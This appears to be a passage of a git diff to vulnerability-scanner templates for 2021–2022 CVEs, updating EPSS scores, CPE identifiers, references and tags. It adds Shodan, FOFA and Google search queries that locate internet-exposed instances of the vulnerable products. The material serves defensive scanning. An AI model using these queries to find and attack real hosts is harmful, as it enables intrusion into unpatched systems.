a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index bb870b65a1..4bd251ef2b 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -31,6 +31,7 @@ info: product: reprise_license_manager shodan-query: http.html:"Reprise License Manager" google-query: inurl:"/goforms/menu" + fofa-query: body="reprise license manager" tags: cve,cve2021,packetstorm,rlm,auth-bypass,reprisesoftware http: diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 781410683c..59dd52d4bf 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -19,8 +19,8 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-20,CWE-917 - epss-score: 0.97453 - epss-percentile: 0.99942 + epss-score: 0.97559 + epss-percentile: 0.99998 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index c455733b0c..a4e3199f66 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44427 cwe-id: CWE-89 - epss-score: 0.03844 - epss-percentile: 0.91709 + epss-score: 0.04431 + epss-percentile: 0.92396 cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index 2ef89c22a9..cb07051a21 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -13,13 +13,15 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 - epss-score: 0.00518 - epss-percentile: 0.74232 + epss-score: 0.0058 + epss-percentile: 0.78015 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +29,7 @@ info: vendor: apache product: superset shodan-query: http.favicon.hash:1582430156 + fofa-query: body="apache superset" tags: cve2021,cve,apache,superset,default-login http: diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index ee675dcc14..2b65a83f4b 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_desktop_central + shodan-query: http.title:"manageengine desktop central 10" + fofa-query: title="manageengine desktop central 10" + google-query: intitle:"manageengine desktop central 10" tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp http: diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index e17fc811d7..806752d520 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: rubyonrails product: rails + shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" tags: cve2021,cve,seclists,redirect,rubyonrails http: diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index f5532462d1..5ff5f61408 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44529 cwe-id: CWE-94 - epss-score: 0.95621 - epss-percentile: 0.99362 + epss-score: 0.97096 + epss-percentile: 0.99778 cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: endpoint_manager_cloud_services_appliance shodan-query: title:"LANDesk(R) Cloud Services Appliance" - tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm + fofa-query: title="landesk(r) cloud services appliance" + google-query: intitle:"landesk(r) cloud services appliance" + tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index ce50ce6618..368146cdc7 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: cybelesoft product: thinfinity_virtualui + shodan-query: http.title:"thinfinity virtualui" + fofa-query: title="thinfinity virtualui" + google-query: intitle:"thinfinity virtualui" tags: cve2021,cve,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft http: diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index 9f2422fa80..5fc3d34144 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2021-45043 cwe-id: CWE-22 epss-score: 0.05404 - epss-percentile: 0.92404 + epss-percentile: 0.93125 cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hd-network_real-time_monitoring_system_project product: hd-network_real-time_monitoring_system google-query: intitle:"HD-Network Real-time Monitoring System V2.0" + shodan-query: http.title:"hd-network real-time monitoring system v2.0" + fofa-query: title="hd-network real-time monitoring system v2.0" tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project http: diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 8e19ad446d..51c20778b8 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -19,14 +19,15 @@ info: cvss-score: 9 cve-id: CVE-2021-45046 cwe-id: CWE-917 - epss-score: 0.9741 - epss-percentile: 0.99904 + epss-score: 0.97363 + epss-percentile: 0.99899 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: log4j tags: cve2021,cve,rce,oast,log4j,injection,kev,apache + http: - raw: - | diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index e7481e67c4..567d6543ce 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2021-45092 cwe-id: CWE-74 epss-score: 0.05776 - epss-percentile: 0.93213 + epss-percentile: 0.93361 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cybelesoft product: thinfinity_virtualui + shodan-query: http.title:"thinfinity virtualui" + fofa-query: title="thinfinity virtualui" + google-query: intitle:"thinfinity virtualui" tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft http: diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 1443bab6f0..e2b4786a79 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45232 cwe-id: CWE-306 - epss-score: 0.97202 - epss-percentile: 0.99785 + epss-score: 0.97214 + epss-percentile: 0.9983 cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index a0fe57ff5f..c01d93a1ec 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -20,13 +20,14 @@ info: cve-id: CVE-2021-45380 cwe-id: CWE-79 epss-score: 0.00314 - epss-percentile: 0.69628 + epss-percentile: 0.70155 cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* metadata: max-request: 1 vendor: appcms product: appcms shodan-query: http.html:"Powerd by AppCMS" + fofa-query: body="powerd by appcms" tags: cve2021,cve,appcms,xss http: diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 67898a4361..51e22bf04a 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -30,6 +30,8 @@ info: vendor: reprisesoftware product: reprise_license_manager shodan-query: http.html:"Reprise License" + fofa-query: body="reprise license manager" + google-query: inurl:"/goforms/menu" tags: cve2021,cve,reprise,xss,seclists,reprisesoftware http: diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 8b2a48eadd..8df5882955 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -21,14 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45428 cwe-id: CWE-639 - epss-score: 0.08441 - epss-percentile: 0.94265 - cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* + epss-score: 0.07905 + epss-percentile: 0.94241 + cpe: cpe:2.3:h:telesquare:tlr-2005ksh:-:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: telesquare - product: tlr-2005ksh_firmware + product: tlr-2005ksh shodan-query: http.html:"TLR-2005KSH" tags: cve2021,cve,telesquare,intrusive,fileupload,packetstorm diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index c60518bae1..1ebc42dac4 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-45968 cwe-id: CWE-918 - epss-score: 0.01877 - epss-percentile: 0.87173 + epss-score: 0.01712 + epss-percentile: 0.87786 cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index a3b0e982d7..f9a8f5f135 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -13,18 +13,22 @@ info: - https://www.exploit-db.com/exploits/49546 - https://nvd.nist.gov/vuln/detail/CVE-2021-46005 - https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-46005 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.50055 + epss-percentile: 0.50094 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: car_rental_management_system_project product: car_rental_management_system + shodan-query: http.html:"car rental management system" + fofa-query: body="car rental management system" tags: cve2021,cve,sourcecodester,authenticated,edb,xss,intrusive,car_rental_management_system_project http: diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 782178a556..15b04806cc 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -15,13 +15,14 @@ info: - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2021-46069 + - https://github.com/plsanu/CVE-2021-46069 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2021-46069 cwe-id: CWE-79 - epss-score: 0.00084 - epss-percentile: 0.34831 + epss-score: 0.0011 + epss-percentile: 0.4404 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index 39c93d4807..18308c9d1e 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -15,13 +15,14 @@ info: - https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2021-46071 + - https://github.com/zecool/cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2021-46071 cwe-id: CWE-79 - epss-score: 0.00084 - epss-percentile: 0.34831 + epss-score: 0.0011 + epss-percentile: 0.4404 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 09844bf438..5990bc2b0f 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2021-46072 cwe-id: CWE-79 - epss-score: 0.00084 - epss-percentile: 0.34354 + epss-score: 0.0011 + epss-percentile: 0.4404 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index d29f497bea..dae8fc9b3a 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -31,6 +31,7 @@ info: product: ligeo_basics shodan-query: title:"Ligeo" fofa-query: title="Ligeo" + google-query: intitle:"ligeo" tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives http: diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 0595060487..bde0d4f672 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -20,13 +20,13 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46381 cwe-id: CWE-22 - epss-score: 0.02202 - epss-percentile: 0.892 - cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* + epss-score: 0.02555 + epss-percentile: 0.90197 + cpe: cpe:2.3:h:dlink:dap-1620:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink - product: dap-1620_firmware + product: dap-1620 tags: cve2021,cve,lfi,router,packetstorm,dlink http: diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 482e8a17b5..8e74158ab1 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-46387 cwe-id: CWE-79 - epss-score: 0.00628 - epss-percentile: 0.76726 + epss-score: 0.09016 + epss-percentile: 0.94598 cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel product: zywall_2_plus_internet_security_appliance_firmware shodan-query: http.title:"Zywall2Plus" + fofa-query: title="zywall2plus" + google-query: intitle:"zywall2plus" tags: cve2021,cve,xss,zyxel,edb http: diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 2751a88c00..850d47644c 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46417 cwe-id: CWE-22 - epss-score: 0.70988 - epss-percentile: 0.97776 + epss-score: 0.64772 + epss-percentile: 0.97891 cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: franklinfueling product: colibri_firmware shodan-query: http.html:"Franklin Fueling Systems" + fofa-query: body="franklin fueling systems" tags: cve2021,cve,packetstorm,franklinfueling,lfi http: diff --git a/http/cves/2021/CVE-2021-46418.yaml b/http/cves/2021/CVE-2021-46418.yaml index 5d23fb79d8..15773d33ff 100644 --- a/http/cves/2021/CVE-2021-46418.yaml +++ b/http/cves/2021/CVE-2021-46418.yaml @@ -14,17 +14,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2021-46418 - epss-score: 0.0528 - epss-percentile: 0.92891 - cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:* + epss-score: 0.07418 + epss-percentile: 0.94089 + cpe: cpe:2.3:h:telesquare:tlr-2855ks6:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: telesquare - product: tlr-2855ks6_firmware + product: tlr-2855ks6 fofa-query: product=="TELESQUARE-TLR-2855KS6" tags: packetstorm,cve,cve2021,telesquare,intrusive - variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml index e8bcf54405..c539c1ff19 100644 --- a/http/cves/2021/CVE-2021-46419.yaml +++ b/http/cves/2021/CVE-2021-46419.yaml @@ -14,8 +14,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-46419 - epss-score: 0.31802 - epss-percentile: 0.96898 + epss-score: 0.36968 + epss-percentile: 0.97176 cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:* metadata: verified: true @@ -24,8 +24,8 @@ info: product: tlr-2855ks6_firmware shodan-query: title:"Login to TLR-2855KS6" fofa-query: product=="TELESQUARE-TLR-2855KS6" + google-query: intitle:"login to tlr-2855ks6" tags: packetstorm,cve,cve2021,telesquare,intrusive - variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index d224356762..3b3bfe8dce 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -21,14 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2021-46422 cwe-id: CWE-78 - epss-score: 0.95567 - epss-percentile: 0.99348 - cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* + epss-score: 0.95843 + epss-percentile: 0.99441 + cpe: cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: telesquare - product: sdt-cs3b1_firmware + product: sdt-cs3b1 shodan-query: html:"SDT-CW3B1" tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb variables: diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 526ea1ebc4..f1d576e1e3 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -29,6 +29,7 @@ info: vendor: telesquare product: tlr-2005ksh_firmware shodan-query: http.html:"TLR-2005KSH" + fofa-query: body="tlr-2005ksh" tags: cve2021,cve,telesquare,intrusive,packetstorm http: diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 11389d38bf..e88a259ec2 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -30,6 +30,7 @@ info: vendor: genieacs product: genieacs shodan-query: http.favicon.hash:-2098066288 + fofa-query: body="genieacs" tags: cve2021,cve,genieacs,rce http: diff --git a/http/cves/2022/CVE-2022-0087.yaml b/http/cves/2022/CVE-2022-0087.yaml index 9ae73afa81..92add31637 100644 --- a/http/cves/2022/CVE-2022-0087.yaml +++ b/http/cves/2022/CVE-2022-0087.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0087 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 65bb8f39b3..250c628b96 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/wp-gdpr-compliance/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0147 - https://plugins.trac.wordpress.org/changeset/2681371 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0147 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40832 + epss-percentile: 0.41295 cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index ae65b6dbeb..baf2ef667d 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0148 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50222 + epss-percentile: 0.50194 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index 136a815fff..c1dcb36456 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0149 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index a257a7ebed..be44aac08e 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0150 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40882 + epss-percentile: 0.41295 cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 74acb94b6e..ea16ab5493 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -29,6 +29,8 @@ info: product: photo_gallery framework: wordpress publicwww-query: "/wp-content/plugins/photo-gallery" + shodan-query: http.html:/wp-content/plugins/photo-gallery + fofa-query: body=/wp-content/plugins/photo-gallery tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index e19759eb49..4264c1b1e0 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0189 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index cba1594814..9545abdff7 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0206 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index 8e92196ddc..f78d344d6d 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0212 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35299 + epss-percentile: 0.36517 cpe: cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 4c16cd61d4..81611ca0d5 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0228 cwe-id: CWE-89 epss-score: 0.03069 - epss-percentile: 0.90788 + epss-percentile: 0.91002 cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: popup_builder framework: wordpress publicwww-query: /wp-content/plugins/popup-builder/ + shodan-query: http.html:/wp-content/plugins/popup-builder/ + fofa-query: body=/wp-content/plugins/popup-builder/ tags: cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli http: diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index 21c12d3822..57e9ca5b7f 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0234 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:pluginus:woocs:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 825e258e1e..b88cba58cd 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -22,13 +22,16 @@ info: cve-id: CVE-2022-0271 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: thimpress product: learnpress framework: wordpress + publicwww-query: /wp-content/plugins/learnpress + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress http: diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index d8722dcaad..6ae3015b86 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -28,6 +28,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,microweber,disclosure,huntr http: diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index 6fe7c560eb..fb165f0490 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0288 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index 88cfcbcf2a..bb1d52c6c2 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0342 cwe-id: CWE-287 epss-score: 0.08015 - epss-percentile: 0.94132 + epss-percentile: 0.94281 cpe: cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 4073e55fe7..c2b6fe27f2 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0349 cwe-id: CWE-89 epss-score: 0.02414 - epss-percentile: 0.89687 + epss-percentile: 0.89914 cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0378.yaml 